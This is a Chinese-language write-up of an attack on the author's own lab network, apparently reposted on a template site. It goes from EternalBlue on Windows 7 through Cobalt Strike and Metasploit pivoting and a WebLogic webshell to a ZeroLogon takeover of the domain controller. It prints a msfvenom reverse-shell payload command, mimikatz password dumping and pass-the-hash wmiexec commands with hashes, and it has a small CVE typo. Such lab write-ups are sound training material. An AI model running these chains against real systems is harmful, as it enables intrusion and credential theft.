滲透目標(biāo)

通過Windows7打入工作組環(huán)境，穿透兩層內(nèi)網(wǎng)拿到DC（域控制器）權(quán)限
環(huán)境搭建

環(huán)境搭建

網(wǎng)絡(luò)拓?fù)?/h4>

虛擬機(jī)網(wǎng)絡(luò)配置

滲透測(cè)試

永恒之藍(lán)外網(wǎng)打點(diǎn)

nmap -sS 192.168.2.0/24掃描外網(wǎng)存活主機(jī)，發(fā)現(xiàn)兩臺(tái)主機(jī)192.168.2.128和192.168.2.129，并且445端口都是打開的，可能存在永恒之藍(lán)漏洞

用msf來進(jìn)行永恒之藍(lán)漏洞的利用：search ms17-010

選擇模塊3來進(jìn)行永恒之藍(lán)漏洞的掃描：use 3，發(fā)現(xiàn)主機(jī)192.168.2.128存在永恒之藍(lán)漏洞

接著使用攻擊模塊對(duì)這個(gè)漏洞進(jìn)行利用use exploit/windows/smb/ms17_010_eternalblue，同樣設(shè)置set rhosts=192.168.2.12

權(quán)限已經(jīng)是SYSTEM權(quán)限，簡(jiǎn)單查看一下系統(tǒng)信息，發(fā)現(xiàn)在一個(gè)工作組內(nèi)（Domain: WORKGROUP)

導(dǎo)入mimikatz，嘗試獲取票據(jù)或者明文密碼信息，得到密碼：xiaodi

Cobalt Strike上線Windows 7

關(guān)閉防火墻

開啟teamserver

客戶端連接
設(shè)置listener并且生成一個(gè)包含這個(gè)listener的木馬

將木馬上傳到外網(wǎng)的Windows 7靶機(jī)并執(zhí)行，靶機(jī)成功上線，查看網(wǎng)絡(luò)

直接跑mimikatz得到密碼xiaodi

psexec橫向移動(dòng)到Windows 10

然后用Portscan掃描主機(jī)

執(zhí)行完掃描后，Targets中會(huì)出現(xiàn)主機(jī)192.168.2.129，使用psexec進(jìn)行橫向，輸入剛剛得到的用戶名和密碼：

成功拿下Windows10

收集相關(guān)信息，發(fā)現(xiàn)新的網(wǎng)段192.168.3.*

掃描一下端口，發(fā)現(xiàn)兩臺(tái)主機(jī)，一臺(tái)192.168.3.128是這臺(tái)Windows 10，另一臺(tái)就是下一階段的目標(biāo)192.168.3.129

MSF上線Windows 10

先生成一個(gè)反向木馬：msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.130 lport=6666 -f exe -o m2.exe

通過Cobalt Strike上傳木馬

msf設(shè)置監(jiān)聽

成功上線，查看路由信息

添加路由

設(shè)置socks代理
配置kaili的全局代理工具proxychains

Weblogic打入win12

利用工具：https://github.com/rabbitmask/WeblogicScan
換成另一種代理方式，利用Cobalt Strike上代理

同樣修改mousepad /etc/proxychains4.conf，配置好端口，再用
proxychains4 python WeblogicScan.py -u 192.168.3.129 -p 7001啟動(dòng)，發(fā)現(xiàn)存在weblogic相關(guān)的CVE漏洞

存在cve-2016-0638，存在cve-2017-10271，存在cve-2017-3506等
然后利用工具：https://github.com/shack2/javaserializetools/releases，
proxychains4 java -jar javaserializetools.jar運(yùn)行jar包，檢測(cè)到漏洞

能夠進(jìn)行命令執(zhí)行

冰蝎生成jsp木馬
上傳生成的jsp木馬


連接木馬

使用Cobalt Strike中轉(zhuǎn)上線，設(shè)置監(jiān)聽

然后生成木馬

使用冰蝎上傳木馬執(zhí)行，成功拿下

至此拿到了三臺(tái)機(jī)器
收集網(wǎng)絡(luò)信息，發(fā)現(xiàn)網(wǎng)段192.168.10.*

端口掃描，發(fā)現(xiàn)其他兩臺(tái)機(jī)器：192.168.10.10和192.168.10.12

橫向移動(dòng)到Win12-WEB

還是先在weblogic這臺(tái)機(jī)器上跑mimiktaz

得到明文密碼Administrator和Admin12345，再來試試橫向移動(dòng)
首先創(chuàng)建一個(gè)監(jiān)聽器，這里由于觀察到上述端口掃描的結(jié)果中445端口是開放的，因此采用SMB類型監(jiān)聽器
然后進(jìn)行橫向移動(dòng)因?yàn)槭侵修D(zhuǎn)的，所以有耐心點(diǎn)，等待幾分鐘后，連接建立

可以看到成功上線Win12-WEB

收集Win12-WEB的網(wǎng)絡(luò)信息

查看系統(tǒng)信息

查看權(quán)限

滲透域控

在上一步中192.168.10.*這個(gè)網(wǎng)段三個(gè)機(jī)器已經(jīng)得到了兩個(gè)，剩下的192.168.10.10就是我們最后的目標(biāo)：DC：域控制器
在Win12-WEB這臺(tái)機(jī)器上查看域控：

Nmap掃描一下，沒有發(fā)現(xiàn)特別的服務(wù)：

然后嘗試尋找DC的相關(guān)漏洞，嘗試cve-2021-1472
首先使用cobalt strike開代理

然后配置kali的proxychains4：mousepad /etc/proxychains4.conf

掃描一下端口：proxychains4 nmap 192.168.10.10，發(fā)現(xiàn)沒有開什么特殊服務(wù)

沒辦法，大海撈針，測(cè)試一下這個(gè)CVE：CVE-2020-1472（https://github.com/SecuraBV/CVE-2020-1472）

嘗試?yán)眠@個(gè)漏洞：https://github.com/dirkjanm/CVE-2020-1472，成功置空DC密碼

獲取hash值

利用得到的Administrator的hash值：aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3:::來進(jìn)行橫向移動(dòng)
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3 DC$/Administrator@192.168.10.10
拿到域控shell，滲透結(jié)束

查看網(wǎng)絡(luò)信息
文章來源地址http://www.zghlxwxcb.cn/news/detail-817387.html

到了這里，關(guān)于記一次靶場(chǎng)搭建與滲透測(cè)試的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！